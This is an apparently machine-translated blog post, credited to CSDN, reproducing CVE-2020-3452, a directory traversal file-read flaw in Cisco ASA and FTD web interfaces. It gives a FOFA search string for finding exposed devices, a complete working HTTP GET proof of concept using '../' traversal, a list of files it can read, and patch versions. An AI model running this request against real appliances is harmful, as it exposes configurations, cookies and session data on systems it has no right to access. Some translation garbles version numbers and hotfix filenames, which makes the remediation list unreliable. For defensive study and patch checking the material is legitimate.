CISCO ASAデバイスの任意のファイル読み取りの脆弱性の再現(CVE-2020-3452)

脆弱性の説明

Cisco Adaptive Security Appliance(ASA)ファイアウォールデバイスとCi​​sco Firepower Threat Defense(FTD)デバイスのWeb管理インターフェイスには、不正なディレクトリトラバーサルの脆弱性とリモートの任意のファイル読み取りの脆弱性があり、不正なリモート攻撃者がディレクトリトラバーサル攻撃を実行して読み取りに敏感になる可能性がありますこの脆弱性は、ASAまたはFTDシステムファイルまたは基盤となるオペレーティングシステム(OS)ファイルにアクセスするために使用できないため、webvpn構成ファイル、ブックマークなどの情報など、Webシステムディレクトリ内のファイルのみを読み取ることができます。 、Web Cookie、Webコンテンツの一部、およびハイパーテキスト転送プロトコルのURL。

脆弱性影響バージョン

ここに画像の説明を挿入
ここに画像の説明を挿入

脆弱性の再発

FOFA検索キーワード:
/+CSCOE+/
POCは次のように発行されます

GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: x.x.x.x
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: webvpnlogin=1; webvpnLang=en

ここに画像の説明を挿入

以下のファイルを読み取ることができます

"sess_update.html"
"blank.html"
"noportal.html"
"portal_ce.html"
"portal.html"
"logon_custom.css"
"svc.html"
"logo.gif"
"portal_inc.lua"
"nostcaccess.html"
"session.js"
"portal.js"
"portal_custom.css"
"running.conf"
"tlbrportal_forms.js"
"logon_forms.js"
"win.js"
"portal.css"
"lced.html"
"pluginlib.js"
"useralert.html"
"ping.html"
"app_index.html"
"shshimdo_url"
"session_password.html"
"relayjar.html"
"relayocx.html"
"color_picker.js"
"color_picker.html"
"cedhelp.html"
"cedmain.html"
"cedlogon.html"
"cedportal.html"
"portal_elements.html"
"commonspawn.js"
"common.js"
"appstart.js"
"relaymonjar.html"
"relaymonocx.html"
"cedsave.html"
"tunnel_linux.jnlp"
"ask.html"
"no_svc.html"
"preview.html"
"cedf.html"
"ced.html"
"logon_redirect.html"
"logout.html"
"tunnel_mac.jnlp"
"gp-gip.html"
"auth.html"
"wrong_url.html"
"logon.html"

意見を修復する

Cisco ASA

前に修理バージョンにアップグレード
9.6バージョンは9.6.4.42バージョンにアップグレード
9.7バージョン補修バージョンにアップグレード
9.8バージョン9.8.420バージョンにアップグレード
9.9バージョン9.9.2.74バージョンにアップグレード
9.10.1.42バージョンに9.10バージョンアップ
9.12から9.12のアップグレード。 3.12バージョン
9.13バージョン9.13.1.10へのアップグレードバージョン
9.14バージョン9.14.1.10バージョンへのアップグレードCiscoFTD

6.2.2バージョンから修復バージョン
へのアップグレード6.2.3バージョンへのアップグレード6.2.3.16バージョン
へのアップグレード6.3.0へのアップグレード6.3.0.5(ホットフィックス)/6.3.0.6/6.4.0.9(ホットフィックス)/6.6.0.1バージョンへの
アップグレード6.4.0バージョンから6.4.0.9(ホットフィックス)/6.4.0.10バージョン
6.5.0から6.5.0.4(ホットフィックス)/6.5.0.5/6.6.0.1バージョン
6.6.0バージョンから6.6.0.1バージョンへのアップグレード
Cisco FTDホットフィックスの詳細:

6.3.0.5:
Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar
6.4.0.9:
Cisco_FTD_Hotfix_BM-6.4 .0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tar
Cisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar
6.5 .0.4:
Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tar
Cisco_FTD_SSP_FP1K_Hotfix_O-
6.5.0.5-3.sh.REL.tarCisco_FTD_SSP_Hotfix_O-6.5.0.5 sh.REL.tarsh.REL.tar
を修復バージョンのCiscoFTDにアップグレードするには、次のいずれかの操作を実行できます。

Cisco Firepower Management Center(FMC)を使用しているデバイスの場合は、FMCインターフェイスを使用してインストールおよびアップグレードしてください。インストールが完了したら、アクセス制御ポリシーを再適用します。

Cisco Firepower Device Manager(FDM)を使用しているデバイスの場合は、FDMインターフェイスを使用してインストールおよびアップグレードしてください。インストールが完了したら、アクセス制御ポリシーを再適用します。

おすすめ

転載: blog.csdn.net/weixin_44146996/article/details/113557524